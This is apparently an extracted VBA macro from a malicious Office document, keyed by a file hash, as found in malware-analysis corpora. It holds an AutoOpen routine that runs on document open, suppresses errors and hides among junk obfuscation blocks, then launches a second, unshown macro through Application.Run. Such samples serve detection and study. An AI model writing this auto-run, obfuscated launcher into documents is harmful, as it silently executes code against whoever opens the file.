Filename     : ./macros/29c3a6fd6bdd1652e03d2b0660a330befe338a3fdefcd8f2ddf192a31d3a302a
OLE stream   : Macros/VBA/QAkKLIKv
VBA filename : QAkKLIKv.bas
----------------------------------------
Attribute VB_Name = "QAkKLIKv"
Sub AutoOpen()
On Error Resume Next
Select Case hMwCX
         Case 74904
            HcSXNv = EfpHPN
            tEkuW = WbFqAz
            lXNBA = Cos(80764 * CBool(97171))
         Case 78980
            TwzVJ = 61577
            WBuirn = Fix(16464)
            IAKFf = Oct(45099)
End Select
Application.Run "UEXjKHlwZXKD", KNWwcadFS
Select Case XPdFhR
         Case 77280
            ZOVtk = wBSqwi
            FPZzOB = AfsJdr
            hrEwN = Cos(65383 * CBool(90164))
         Case 39519
            VuYXL = 97866
            PjonRA = Fix(7935)
            SPvGu = Oct(42223)
End Select
End Sub
